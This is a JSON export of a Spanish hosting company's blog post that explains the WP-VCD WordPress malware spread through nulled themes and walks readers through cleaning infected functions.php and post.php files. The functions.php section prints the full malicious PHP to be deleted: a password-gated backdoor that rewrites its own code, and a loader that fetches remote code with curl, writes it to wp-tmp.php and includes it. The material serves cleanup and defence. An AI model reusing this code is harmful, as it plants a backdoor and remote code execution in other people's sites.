{"id":32787,"date":"2019-12-19T14:58:33","date_gmt":"2019-12-19T12:58:33","guid":{"rendered":"https:\/\/www.hostinet.com\/formacion\/?p=32787"},"modified":"2022-01-12T12:52:34","modified_gmt":"2022-01-12T10:52:34","slug":"wp-vcd-el-virus-mas-extendido-en-wordpress-como-eliminarlo","status":"publish","type":"post","link":"https:\/\/www.hostinet.com\/formacion\/wordpress\/wp-vcd-el-virus-mas-extendido-en-wordpress-como-eliminarlo\/","title":{"rendered":"WP-VCD el Virus m\u00e1s Extendido en WordPress &#8211; C\u00f3mo Eliminarlo"},"content":{"rendered":" <!-- x0 --><div style=\"min-height: 30px; margin-top: 0px; padding-bottom: 7px; z-index: 1;position: relative; float: none;\" class=\"social-container\"><\/div><p><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter size-full wp-image-39925\" src=\"https:\/\/www.hostinet.com\/formacion\/wp-content\/uploads\/2019\/12\/wp-vcd-600x400-1.jpg\" alt=\"\" width=\"600\" height=\"400\" srcset=\"https:\/\/www.hostinet.com\/formacion\/wp-content\/uploads\/2019\/12\/wp-vcd-600x400-1.jpg 600w, https:\/\/www.hostinet.com\/formacion\/wp-content\/uploads\/2019\/12\/wp-vcd-600x400-1-500x333.jpg 500w, https:\/\/www.hostinet.com\/formacion\/wp-content\/uploads\/2019\/12\/wp-vcd-600x400-1-350x233.jpg 350w\" sizes=\"auto, (max-width: 600px) 100vw, 600px\" \/><\/p>\n<p><strong>Virus y malware<\/strong> para <strong>WordPress<\/strong> hay un mont\u00f3n, pero ninguno est\u00e1 m\u00e1s extendido que <strong>WP-VCD<\/strong>.<\/p>\n<p>Sin duda, la infecci\u00f3n <strong>WP-VCD<\/strong> es la n\u00famero uno, la que se lleva el gato al agua, la que m\u00e1s difundida est\u00e1 y la que <strong>m\u00e1s instalaciones de WordPress consigue infectar<\/strong> al cabo del a\u00f1o.<\/p>\n<p>Y lo pero de todo, es que en la mayor\u00eda de los casos, el responsable de que tu WordPress acabe siendo afectado por el malware WP-VCD, <strong>\u00a1eres t\u00fa mismo!<\/strong>.<\/p>\n<p>Pues si, <strong>WP-VCD<\/strong> se propaga por medio de plugins o <em>themes<\/em> pirateados que se descargan de sitios no oficiales y de poca confianza.<\/p>\n<p>Un cosa, si ve la palabra <strong>NULLED<\/strong> en un producto de pago, como puede ser el popular <em>theme<\/em> de WordPress <strong>Divi<\/strong>, no significa versi\u00f3n de prueba, ni gratuita.<br \/>\n<strong>NULLED<\/strong> no significa gratuito, significa <strong>pirateado<\/strong> y es m\u00e1s que posible que hayan modificado el c\u00f3digo para poder <strong>hackear<\/strong> tu web m\u00e1s tarde o temprano.<\/p>\n<p>Nulled significa <strong>Anulado<\/strong> y esto es as\u00ed porque un tercero lo ha descargado y modificado su c\u00f3digo para que puedas utilizarlo sin pagar, pero al modificar el c\u00f3digo <strong>\u00a1puede hacer lo que quiera!<\/strong> y te aseguro que lo har\u00e1, <strong>de una forma u otra se <em>\u00abcobrar\u00e1\u00bb<\/em> el favor<\/strong> que te hace al poder usar algo que tiene un coste de manera gratuita.<\/p>\n<p>Puede que no al principio, pueden pasar meses, cuando ya tengas la web montada y todo el sistema en producci\u00f3n, pero al final&#8230; <strong>\u00a1\u00a1te hacker\u00e1n la web!!<\/strong><\/p>\n<p>Hemos usado como ejemplo el <em>theme<\/em> <strong>Divi<\/strong> y no es casualidad, ya que en la mayor\u00eda de los casos donde encontramos el malware <strong>WP-VCP<\/strong>, es en este <em>theme<\/em>, pero no significa que sea el \u00fanico.<\/p>\n<p>En plugins de pago <em>\u00abnulled\u00bb<\/em> tambi\u00e9n lo podemos encontrar y otros <em>themes<\/em> populares como <strong>Eduma<\/strong>, <strong>Cesis<\/strong> o <strong>Cerato<\/strong>.<\/p>\n<p>Si buscas <em>\u00abCerato theme\u00bb<\/em> en Google , ver\u00e1s que te lleva a p\u00e1gina de venta de Themeforest.net y que tiene un precio:<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter size-medium wp-image-32794\" src=\"https:\/\/www.hostinet.com\/formacion\/wp-content\/uploads\/2019\/12\/cerato-theme-original-600x343.jpg\" alt=\"cerato theme original con su precio\" width=\"600\" height=\"343\" srcset=\"https:\/\/www.hostinet.com\/formacion\/wp-content\/uploads\/2019\/12\/cerato-theme-original.jpg 600w, https:\/\/www.hostinet.com\/formacion\/wp-content\/uploads\/2019\/12\/cerato-theme-original-500x286.jpg 500w, https:\/\/www.hostinet.com\/formacion\/wp-content\/uploads\/2019\/12\/cerato-theme-original-350x200.jpg 350w\" sizes=\"auto, (max-width: 600px) 100vw, 600px\" \/><\/p>\n<p>y su buscas <em>\u00abCerato theme free\u00bb<\/em> ver\u00e1s un mont\u00f3n de resultados que te llevan a sitios como <em>\u00abdownoladfreethems\u00bb<\/em> y cosas parecidas.<\/p>\n<p>Todas estas opciones son piratas o nulled, como quieras llamarlas, pero si las usas tienes un porcentaje alt\u00edsimo de conocer a <strong>WP-VCD<\/strong> en primera persona.<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter size-medium wp-image-32793\" src=\"https:\/\/www.hostinet.com\/formacion\/wp-content\/uploads\/2019\/12\/cerato-theme-free-nulled-600x471.jpg\" alt=\"cerato theme free nulled o piratas\" width=\"600\" height=\"471\" srcset=\"https:\/\/www.hostinet.com\/formacion\/wp-content\/uploads\/2019\/12\/cerato-theme-free-nulled.jpg 600w, https:\/\/www.hostinet.com\/formacion\/wp-content\/uploads\/2019\/12\/cerato-theme-free-nulled-500x393.jpg 500w, https:\/\/www.hostinet.com\/formacion\/wp-content\/uploads\/2019\/12\/cerato-theme-free-nulled-350x275.jpg 350w\" sizes=\"auto, (max-width: 600px) 100vw, 600px\" \/><\/p>\n<hr \/>\n<p><a href=\"https:\/\/www.hostinet.com\/hosting-web\/\" target=\"_blank\"><img decoding=\"async\" class=\"alignnone size-full\" src=\"https:\/\/www.hostinet.com\/formacion\/wp-content\/uploads\/2024\/03\/banner_hostinet_generico.jpg\" alt=\"Hosting Gen\u00e9rico\"><\/a><\/p>\n<hr \/>\n<h2>Qu\u00e9 Hace WP-VCD\u00a0 con mi WordPress<\/h2>\n<p>\u00c9l o los creadores de WP-VCD han cambiado sus estrategias de monetizaci\u00f3n a lo largo del tiempo, pero hay algunas constantes.<\/p>\n<p>Por ejemplo <strong>a\u00f1aden enlaces hacia sus sitios web de descarga para posicionarse en Google<\/strong> y el resto de los buscadores en las primeras posiciones, como hemos mostrado en la captura de pantalla anterior.<\/p>\n<p>De esta manera consiguen m\u00e1s <em>\u00abclientes\u00bb<\/em> y pueden propagar con mayor rapidez.<\/p>\n<p>Luego a\u00f1aden publicidad con contenido malicioso que se mostrar\u00e1 a los visitantes de tu web, bien para <strong>ganar dinero con la publicidad<\/strong>, bien para intentar enga\u00f1arles por medio de <a title=\"Qu\u00e9 es el Phishing y c\u00f3mo Puedes Protegerte\" href=\"https:\/\/www.hostinet.com\/formacion\/general\/que-es-el-phishing-y-como-puedes-protegerte\/\" target=\"_blank\" rel=\"noopener noreferrer\">alguna trampa phishing<\/a>.<\/p>\n<p>Por cierto, t\u00fa, como administrador de WordPress, no ver\u00e1s esa publicidad, s\u00f3lo la ver\u00e1n los visitantes, de esta manera <strong>tardar\u00e1s m\u00e1s en darte cuenta<\/strong> de que existe un problema y ellos ganar\u00e1n m\u00e1s.<\/p>\n<p>Aunque <strong>si eres cliente de Hostinet, nosotros lo detectaremos y te informaremos<\/strong> de que tu WordPress est\u00e1 infectado con WP-VCD.<\/p>\n<p>Incluso pueden redireccionar todo tu sitio a otra URL directamente, vamos, que <strong>pueden hacer pr\u00e1cticamente lo que quieran<\/strong>.<\/p>\n<h2>C\u00f3mo Elimino WP-VCD de mi WordPress<\/h2>\n<p>Antes te hemos comentado que <strong>Hostinet<\/strong> te avisar\u00eda si detecta que t sitio ha sido infectado.<\/p>\n<p>Esto es as\u00ed porque <strong>hacemos un escaneo de seguridad en busca de malware o virus que se hayan podido colar en tu hosting<\/strong> y esto est\u00e1 incluido en precio que pagas por tu alojamiento web, as\u00ed que nos tienes c\u00f3mo el antivirus particular de tu WordPress.<\/p>\n<p>Si detectamos alg\u00fan problema, <strong>pondremos los archivos comprometidos en cuarentena<\/strong>, protegeremos tu web con usuario y contrase\u00f1a para que nadie m\u00e1s se vea afectado.<\/p>\n<p>Te <strong>enviaremos un email explic\u00e1ndote el problema<\/strong> e indic\u00e1ndote cu\u00e1les son los archivos infectados. Algo parecido a esto:<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter size-medium wp-image-32795\" src=\"https:\/\/www.hostinet.com\/formacion\/wp-content\/uploads\/2019\/12\/email-aviso-codigo-malicioso-600x505.jpg\" alt=\"email aviso codigo malicioso de Hostinet\" width=\"600\" height=\"505\" srcset=\"https:\/\/www.hostinet.com\/formacion\/wp-content\/uploads\/2019\/12\/email-aviso-codigo-malicioso.jpg 600w, https:\/\/www.hostinet.com\/formacion\/wp-content\/uploads\/2019\/12\/email-aviso-codigo-malicioso-500x421.jpg 500w, https:\/\/www.hostinet.com\/formacion\/wp-content\/uploads\/2019\/12\/email-aviso-codigo-malicioso-350x295.jpg 350w\" sizes=\"auto, (max-width: 600px) 100vw, 600px\" \/><\/p>\n<p>El malware WP_VCD afecta principalmente a los siguientes archivos:<\/p>\n<ul>\n<li><strong>&#8211; wp-tmp.php<\/strong><\/li>\n<li><strong>&#8211; wp-vcd.php<\/strong><\/li>\n<li><strong>&#8211; functions.php<\/strong><\/li>\n<li><strong>&#8211; post.php<\/strong><\/li>\n<li><strong>&#8211; wp-feed.php<\/strong><\/li>\n<\/ul>\n<p>Aunque en las \u00faltimas versiones el archivo <strong>wp-feed.php<\/strong> no se encuentra y esto puede varia en cualquier momento, ya hemos advertido que el virus <strong>WP-VCD<\/strong> puede cambiar o mutar como sus creadores lo crean conveniente.<\/p>\n<p>En cualquier caso, en el email que te enviaremos te mostraremos los archivos con problemas.<\/p>\n<p>De estos archivos, <strong>s\u00f3lo nos importan dos de ellos<\/strong>:<\/p>\n<ul>\n<li><strong>&#8211; functions.php<\/strong><\/li>\n<li><strong>&#8211; post.php<\/strong><\/li>\n<\/ul>\n<p><strong>El resto puedes eliminarlos directamente<\/strong>, son parte de WP-VCD y no afectar\u00e1 al sitio web, pero el archivo <strong>functions.php<\/strong> y <strong>post.php<\/strong> sin imprescindibles para el funcionamiento de tu <em>theme<\/em> y <strong>tienes que limpiarlos<\/strong>.<\/p>\n<p>Por cierto, es un buen momento para decirte que da igual que el <em>theme nulled<\/em> no est\u00e9 activo, si est\u00e1 en la carpeta <em>themes<\/em> de WordPress, <strong>WP-VCD se propagar\u00e1 al resto de <em>themes<\/em> instalados<\/strong>.<\/p>\n<p>Para limpiar estos archivos, yo prefiero descargarlos y <a title=\"Los 4 Mejores Editores HTML de 2019\" href=\"https:\/\/www.hostinet.com\/formacion\/diseno-web\/4-mejores-editores-html-2019\/\" target=\"_blank\" rel=\"noopener noreferrer\">editarlo desde el ordenador con cualquiera de los editores de texto que recomendamos en este post<\/a>.<\/p>\n<p>Para descargarlos, entras a cPanel y vas al <strong>Administrador de Archivos<\/strong>. All\u00ed encontrar\u00e1s la carpeta <strong>Cuarentena<\/strong> y los archivos infectados.<\/p>\n<p>La ruta ser\u00e1 algo as\u00ed:<\/p>\n<pre><code>cuarentena\/home\/TuUsuario\/public_html\/wp-content\/themes\/TuTheme\/functions.php\r\n<\/code><\/pre>\n<pre><code>cuarentena\/home\/TuUsuario\/public_html\/wp-includes\/post.php\r\n<\/code><\/pre>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter size-full wp-image-32839\" src=\"https:\/\/www.hostinet.com\/formacion\/wp-content\/uploads\/2019\/12\/localizar-archivos-infectados.jpg\" alt=\"localizar archivos infectados - Administrador Archivos cPanel\" width=\"599\" height=\"369\" srcset=\"https:\/\/www.hostinet.com\/formacion\/wp-content\/uploads\/2019\/12\/localizar-archivos-infectados.jpg 599w, https:\/\/www.hostinet.com\/formacion\/wp-content\/uploads\/2019\/12\/localizar-archivos-infectados-500x308.jpg 500w, https:\/\/www.hostinet.com\/formacion\/wp-content\/uploads\/2019\/12\/localizar-archivos-infectados-350x216.jpg 350w\" sizes=\"auto, (max-width: 599px) 100vw, 599px\" \/><\/p>\n<p>En la captura puedes ver que el <em>theme<\/em> infecrtado es <strong>Divi<\/strong>, pero como hemos comentado antes, no siempre es as\u00ed, <strong>WP-VCD<\/strong> puede haber entrado por ah\u00ed y luego infectar un <em>theme<\/em> leg\u00edtimo.<\/p>\n<h3>Limpiar post.php<\/h3>\n<p>Una vez descargados los archivos abrimos primero el archivo <strong>post.php<\/strong> con cualquier editor de texto mencionado en el anterior enlace.<\/p>\n<p>Veremos algo as\u00ed:<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter size-medium wp-image-32797\" src=\"https:\/\/www.hostinet.com\/formacion\/wp-content\/uploads\/2019\/12\/captura-postphp-wp-vcd-600x467.jpg\" alt=\"captura post.php infectado wp-vcd\" width=\"600\" height=\"467\" srcset=\"https:\/\/www.hostinet.com\/formacion\/wp-content\/uploads\/2019\/12\/captura-postphp-wp-vcd.jpg 600w, https:\/\/www.hostinet.com\/formacion\/wp-content\/uploads\/2019\/12\/captura-postphp-wp-vcd-500x389.jpg 500w, https:\/\/www.hostinet.com\/formacion\/wp-content\/uploads\/2019\/12\/captura-postphp-wp-vcd-350x272.jpg 350w\" sizes=\"auto, (max-width: 600px) 100vw, 600px\" \/><\/p>\n<p>Como ver\u00e1s, al principio del c\u00f3digo hay una linea que hace referencia al archivo <strong>wp-vcd.php<\/strong> y el c\u00f3digo ser\u00e1 este o muy parecido:<\/p>\n<pre><code>&lt;?php if (file_exists(dirname(__FILE__) . '\/wp-vcd.php')) include_once(dirname(__FILE__) . '\/wp-vcd.php'); ?&gt;\r\n<\/code><\/pre>\n<p>Lo que tenemos que hacer es <strong>eliminar esta linea de c\u00f3digo<\/strong> y <strong>guardar el archivo post.php<\/strong>, ya limpio, pero <strong>\u00a1\u00a1cuidado!!<\/strong> No borrar el <strong>&lt;?php<\/strong> del final.<\/p>\n<p>Tiene que quedar algo as\u00ed:<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter size-full wp-image-32798\" src=\"https:\/\/www.hostinet.com\/formacion\/wp-content\/uploads\/2019\/12\/archivo-postphp-limpio.jpg\" alt=\"archivo post. php limpio sin wp-vcd\" width=\"405\" height=\"379\" srcset=\"https:\/\/www.hostinet.com\/formacion\/wp-content\/uploads\/2019\/12\/archivo-postphp-limpio.jpg 405w, https:\/\/www.hostinet.com\/formacion\/wp-content\/uploads\/2019\/12\/archivo-postphp-limpio-350x328.jpg 350w\" sizes=\"auto, (max-width: 405px) 100vw, 405px\" \/><\/p>\n<p>&nbsp;<\/p>\n<h3>Limpiar Functions.php<\/h3>\n<p>Ahora abrimos el otro archivo, <strong>functions.php<\/strong>, aqu\u00ed el trabajo es m\u00e1s complicado, ya que <strong>el c\u00f3digo que tenemos que eliminar es m\u00e1s grande<\/strong>.<\/p>\n<p>Tendr\u00e1s que hacer <em>scroll<\/em> para localizar el final.<\/p>\n<p>Mi recomendaci\u00f3n es que vayas hacia abajo hasta que encuentres el final del c\u00f3digo que ser\u00e1 algo as\u00ed:<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter size-full wp-image-32799\" src=\"https:\/\/www.hostinet.com\/formacion\/wp-content\/uploads\/2019\/12\/fuctionsphp-final-codigo-wp-vc.jpg\" alt=\"fuctions.php final codigo wp-vc\" width=\"432\" height=\"361\" srcset=\"https:\/\/www.hostinet.com\/formacion\/wp-content\/uploads\/2019\/12\/fuctionsphp-final-codigo-wp-vc.jpg 432w, https:\/\/www.hostinet.com\/formacion\/wp-content\/uploads\/2019\/12\/fuctionsphp-final-codigo-wp-vc-350x292.jpg 350w\" sizes=\"auto, (max-width: 432px) 100vw, 432px\" \/><\/p>\n<p>F\u00edjate que en la captura <strong>estamos en la l\u00ednea 184<\/strong>, as\u00ed que es un pedazo de c\u00f3digo.<\/p>\n<p>Para seleccionarlo, tienes que tener cuidado con no borrar tambi\u00e9n <strong>&lt;?php<\/strong>, como hemos hecho antes en el otro archivo, ya que la \u00faltima l\u00ednea acaba as\u00ed: <strong>?&gt;&lt;?php<\/strong><\/p>\n<p>Este es todo el c\u00f3digo que tenemos que eliminar:<\/p>\n<pre><code>&lt;?php\r\nif (isset($_REQUEST['action']) &amp;&amp; isset($_REQUEST['password']) &amp;&amp; ($_REQUEST['password'] == '913518a8045985658f18cebc523df95c'))\r\n\t{\r\n$div_code_name=\"wp_vcd\";\r\n\t\tswitch ($_REQUEST['action'])\r\n\t\t\t{\r\n\r\n\t\t\t\t\r\n\r\n\r\n\r\n\r\n\t\t\t\tcase 'change_domain';\r\n\t\t\t\t\tif (isset($_REQUEST['newdomain']))\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t\r\n\t\t\t\t\t\t\tif (!empty($_REQUEST['newdomain']))\r\n\t\t\t\t\t\t\t\t{\r\n                                                                           if ($file = @file_get_contents(__FILE__))\r\n\t\t                                                                    {\r\n                                                                                                 if(preg_match_all('\/\\$tmpcontent = @file_get_contents\\(\"http:\\\/\\\/(.*)\\\/code\\.php\/i',$file,$matcholddomain))\r\n                                                                                                             {\r\n\r\n\t\t\t                                                                           $file = preg_replace('\/'.$matcholddomain[1][0].'\/i',$_REQUEST['newdomain'], $file);\r\n\t\t\t                                                                           @file_put_contents(__FILE__, $file);\r\n\t\t\t\t\t\t\t\t\t                           print \"true\";\r\n                                                                                                             }\r\n\r\n\r\n\t\t                                                                    }\r\n\t\t\t\t\t\t\t\t}\r\n\t\t\t\t\t\t}\r\n\t\t\t\tbreak;\r\n\r\n\t\t\t\t\t\t\t\tcase 'change_code';\r\n\t\t\t\t\tif (isset($_REQUEST['newcode']))\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t\r\n\t\t\t\t\t\t\tif (!empty($_REQUEST['newcode']))\r\n\t\t\t\t\t\t\t\t{\r\n                                                                           if ($file = @file_get_contents(__FILE__))\r\n\t\t                                                                    {\r\n                                                                                                 if(preg_match_all('\/\\\/\\\/\\$start_wp_theme_tmp([\\s\\S]*)\\\/\\\/\\$end_wp_theme_tmp\/i',$file,$matcholdcode))\r\n                                                                                                             {\r\n\r\n\t\t\t                                                                           $file = str_replace($matcholdcode[1][0], stripslashes($_REQUEST['newcode']), $file);\r\n\t\t\t                                                                           @file_put_contents(__FILE__, $file);\r\n\t\t\t\t\t\t\t\t\t                           print \"true\";\r\n                                                                                                             }\r\n\r\n\r\n\t\t                                                                    }\r\n\t\t\t\t\t\t\t\t}\r\n\t\t\t\t\t\t}\r\n\t\t\t\tbreak;\r\n\t\t\t\t\r\n\t\t\t\tdefault: print \"ERROR_WP_ACTION WP_V_CD WP_CD\";\r\n\t\t\t}\r\n\t\t\t\r\n\t\tdie(\"\");\r\n\t}\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n$div_code_name = \"wp_vcd\";\r\n$funcfile      = __FILE__;\r\nif(!function_exists('theme_temp_setup')) {\r\n    $path = $_SERVER['HTTP_HOST'] . $_SERVER[REQUEST_URI];\r\n    if (stripos($_SERVER['REQUEST_URI'], 'wp-cron.php') == false &amp;&amp; stripos($_SERVER['REQUEST_URI'], 'xmlrpc.php') == false) {\r\n        \r\n        function file_get_contents_tcurl($url)\r\n        {\r\n            $ch = curl_init();\r\n            curl_setopt($ch, CURLOPT_AUTOREFERER, TRUE);\r\n            curl_setopt($ch, CURLOPT_HEADER, 0);\r\n            curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);\r\n            curl_setopt($ch, CURLOPT_URL, $url);\r\n            curl_setopt($ch, CURLOPT_FOLLOWLOCATION, TRUE);\r\n            $data = curl_exec($ch);\r\n            curl_close($ch);\r\n            return $data;\r\n        }\r\n        \r\n        function theme_temp_setup($phpCode)\r\n        {\r\n            $tmpfname = tempnam(sys_get_temp_dir(), \"theme_temp_setup\");\r\n            $handle   = fopen($tmpfname, \"w+\");\r\n           if( fwrite($handle, \"&lt;?php\\n\" . $phpCode))\r\n\t\t   {\r\n\t\t   }\r\n\t\t\telse\r\n\t\t\t{\r\n\t\t\t$tmpfname = tempnam('.\/', \"theme_temp_setup\");\r\n            $handle   = fopen($tmpfname, \"w+\");\r\n\t\t\tfwrite($handle, \"&lt;?php\\n\" . $phpCode);\r\n\t\t\t}\r\n\t\t\tfclose($handle);\r\n            include $tmpfname;\r\n            unlink($tmpfname);\r\n            return get_defined_vars();\r\n        }\r\n        \r\n\r\n$wp_auth_key='38fe324f1e4c10f398ec3de5ba615271';\r\n        if (($tmpcontent = @file_get_contents(\"https:\/\/hostinet.com\") OR $tmpcontent = @file_get_contents_tcurl(\"https:\/\/hostinet.com\")) AND stripos($tmpcontent, $wp_auth_key) !== false) {\r\n\r\n            if (stripos($tmpcontent, $wp_auth_key) !== false) {\r\n                extract(theme_temp_setup($tmpcontent));\r\n                @file_put_contents(ABSPATH . 'wp-includes\/wp-tmp.php', $tmpcontent);\r\n                \r\n                if (!file_exists(ABSPATH . 'wp-includes\/wp-tmp.php')) {\r\n                    @file_put_contents(get_template_directory() . '\/wp-tmp.php', $tmpcontent);\r\n                    if (!file_exists(get_template_directory() . '\/wp-tmp.php')) {\r\n                        @file_put_contents('wp-tmp.php', $tmpcontent);\r\n                    }\r\n                }\r\n                \r\n            }\r\n        }\r\n        \r\n        \r\n        elseif ($tmpcontent = @file_get_contents(\"https:\/\/hostinet.com\")  AND stripos($tmpcontent, $wp_auth_key) !== false ) {\r\n\r\nif (stripos($tmpcontent, $wp_auth_key) !== false) {\r\n                extract(theme_temp_setup($tmpcontent));\r\n                @file_put_contents(ABSPATH . 'wp-includes\/wp-tmp.php', $tmpcontent);\r\n                \r\n                if (!file_exists(ABSPATH . 'wp-includes\/wp-tmp.php')) {\r\n                    @file_put_contents(get_template_directory() . '\/wp-tmp.php', $tmpcontent);\r\n                    if (!file_exists(get_template_directory() . '\/wp-tmp.php')) {\r\n                        @file_put_contents('wp-tmp.php', $tmpcontent);\r\n                    }\r\n                }\r\n                \r\n            }\r\n        } \r\n\t\t\r\n\t\t        elseif ($tmpcontent = @file_get_contents(\"https:\/\/hostinet.com\")  AND stripos($tmpcontent, $wp_auth_key) !== false ) {\r\n\r\nif (stripos($tmpcontent, $wp_auth_key) !== false) {\r\n                extract(theme_temp_setup($tmpcontent));\r\n                @file_put_contents(ABSPATH . 'wp-includes\/wp-tmp.php', $tmpcontent);\r\n                \r\n                if (!file_exists(ABSPATH . 'wp-includes\/wp-tmp.php')) {\r\n                    @file_put_contents(get_template_directory() . '\/wp-tmp.php', $tmpcontent);\r\n                    if (!file_exists(get_template_directory() . '\/wp-tmp.php')) {\r\n                        @file_put_contents('wp-tmp.php', $tmpcontent);\r\n                    }\r\n                }\r\n                \r\n            }\r\n        }\r\n\t\telseif ($tmpcontent = @file_get_contents(ABSPATH . 'wp-includes\/wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== false) {\r\n            extract(theme_temp_setup($tmpcontent));\r\n           \r\n        } elseif ($tmpcontent = @file_get_contents(get_template_directory() . '\/wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== false) {\r\n            extract(theme_temp_setup($tmpcontent)); \r\n\r\n        } elseif ($tmpcontent = @file_get_contents('wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== false) {\r\n            extract(theme_temp_setup($tmpcontent)); \r\n\r\n        } \r\n        \r\n        \r\n        \r\n        \r\n        \r\n    }\r\n}\r\n\r\n\/\/$start_wp_theme_tmp\r\n\r\n\r\n\r\n\/\/wp_tmp\r\n\r\n\r\n\/\/$end_wp_theme_tmp\r\n?&gt;\r\n<\/code><\/pre>\n<p>&nbsp;<\/p>\n<p>Os tendr\u00e1 que quedar un archivo <strong>functions.php<\/strong> parecido a esto:<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter size-medium wp-image-32800\" src=\"https:\/\/www.hostinet.com\/formacion\/wp-content\/uploads\/2019\/12\/functionsphp-limpio-vp-vcd-600x339.jpg\" alt=\"functions.php limpio sin vp-vcd\" width=\"600\" height=\"339\" srcset=\"https:\/\/www.hostinet.com\/formacion\/wp-content\/uploads\/2019\/12\/functionsphp-limpio-vp-vcd.jpg 600w, https:\/\/www.hostinet.com\/formacion\/wp-content\/uploads\/2019\/12\/functionsphp-limpio-vp-vcd-500x283.jpg 500w, https:\/\/www.hostinet.com\/formacion\/wp-content\/uploads\/2019\/12\/functionsphp-limpio-vp-vcd-350x198.jpg 350w\" sizes=\"auto, (max-width: 600px) 100vw, 600px\" \/><\/p>\n<p>Una vez limpios y guardados los archivos, hay que volver a ponerlos en su sitio, pero no en la carpeta de cuarentena, si no en la ruta que corresponda a cada archivo.<\/p>\n<pre><code>public_html\/wp-content\/themes\/TuTheme\/functions.php\r\n<\/code><\/pre>\n<pre><code>\/public_html\/wp-includes\/post.php\r\n<\/code><\/pre>\n<p>Despu\u00e9s de subir los archivos, sigue las instrucciones del email que te hayamos enviado, es decir <strong>actualizar todo<\/strong>, <strong>cambiar contrase\u00f1as<\/strong>, <strong>escanear el equipo en busca de virus<\/strong>, etc&#8230;<\/p>\n<p>Tambi\u00e9n es conveniente que <strong>busques entre los usuarios de WordPress con permisos de administrador<\/strong>, por si ves alguno que no debiera estar ah\u00ed, eliminarlo cuanto antes.<\/p>\n<p>Si nos respondes al email indic\u00e1ndonos los pasos que has realizado y enviado la captura de pantalla que solicitamos, la incidencia se dar\u00e1 por finalizada y <strong>tu web estar\u00e1 activa despu\u00e9s de que revisemos que todo est\u00e1 correcto<\/strong>.<\/p>\n<p>\u00a1\u00a1Ah!! y una cosa que no est\u00e1 en el email, <strong>\u00a1\u00a1no vuelvas a usar plugins o <em>themes<\/em> nulled!!<\/strong><\/p>\n<h2>Cosas a Tener en Cuenta<\/h2>\n<p>Como has visto, limpiar un sitio WordPress infectado con <strong>WP-VCD<\/strong> es tedioso y m\u00e1s si nunca has trabajado con editores de c\u00f3digo.<\/p>\n<p>Adem\u00e1s, esto es lo que sabemos hasta ahora, pero los creadores del malware <strong>WP-VCD<\/strong> pueden cambiar su forma de actuar cuando quieran.<\/p>\n<p>Los <em>themes nulled<\/em> o los <strong>plugins piratas<\/strong> son la puerta de acceso, luego pueden desarrollar los ataques con m\u00e1s o menos sofisticaci\u00f3n, as\u00ed que es posible que lo dicho en este post, publicado en diciembre de 2019, no sierva para nada a mediados de 2020.<\/p>\n<p>Y piensa que <strong>todo este foll\u00f3n lo puedes provocar t\u00fa mismo<\/strong>, instalado un detonante llamado <em>nulled<\/em>&#8230;. <strong>\u00bfvale la pena?<\/strong>.<\/p>\n<p>Si quieres toda la <strong>informaci\u00f3n detallada<\/strong> sobre <strong>el malware WP-VCD<\/strong>, incluida la empresa que est\u00e1 detr\u00e1s y muchos m\u00e1s datos jugosos, puedes ver el <strong>informe completo que los chicos de Wordfence han publicado<\/strong> y animan a difundir.<\/p>\n<p>Es un PDF de 27 p\u00e1ginas y est\u00e1 en ingl\u00e9s, pero es muy revelador:<br \/>\n<em><a href=\"https:\/\/www.wordfence.com\/wp-content\/uploads\/2019\/11\/Wordfence-WP-VCD-Whitepaper.pdf\" target=\"_blank\" rel=\"noopener noreferrer\">WP-VCD: The Malware You Installed On Your Own Site<\/a><\/em><\/p>\n<h2>Hosting WordPress con SSD y LiteSpeed<\/h2>\n<p>&nbsp;<\/p>\n<p><a href=\"https:\/\/www.hostinet.com\/hosting-wordpress\/\" target=\"_blank\"><img decoding=\"async\" class=\"alignnone size-full\" src=\"https:\/\/www.hostinet.com\/formacion\/wp-content\/uploads\/2026\/03\/banner_hosting_wordpress.jpg\" alt=\"Hosting WordPress\"><\/a><\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<div style=\"min-height: 30px; margin-top: 0px; padding-bottom: 7px; z-index: 1;position: relative; float: none;\" class=\"social-container\"><\/div> <!-- x1 -->","protected":false},"excerpt":{"rendered":"<p>Virus y malware para WordPress hay un mont\u00f3n, pero ninguno est\u00e1 m\u00e1s extendido que WP-VCD. Sin duda, la infecci\u00f3n WP-VCD es la n\u00famero uno, la que se lleva el gato al agua, la que m\u00e1s difundida est\u00e1 y la que m\u00e1s instalaciones de WordPress consigue infectar al cabo del a\u00f1o.\u2026 <\/p>\n<div class=\"post-more\">\n<p><a class=\"btn button\" href=\"https:\/\/www.hostinet.com\/formacion\/wordpress\/wp-vcd-el-virus-mas-extendido-en-wordpress-como-eliminarlo\/\">Sigue leyendo &rarr;<\/a><\/p>\n<\/div>\n","protected":false},"author":14,"featured_media":32802,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[1783],"tags":[],"class_list":["post-32787","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-wordpress"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.3 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>WP-VCD el Virus m\u00e1s Extendido en WordPress - C\u00f3mo Eliminarlo<\/title>\n<meta name=\"description\" content=\"Virus y malware para WordPress hay un mont\u00f3n, pero ninguno est\u00e1 m\u00e1s extendido que WP-VCD. Sin duda, la infecci\u00f3n WP-VCD es la n\u00famero uno, la que se lleva WP-VCD es el virus o malware m\u00e1s extendido en WordPress. Aqu\u00ed te contamos c\u00f3mo has acabado infectado y en caso de estarlo, los pasos que tienes que dar para limpiar tu WordPress del malware WP-VCD.\" \/>\n<meta name=\"robots\" content=\"index, follow, 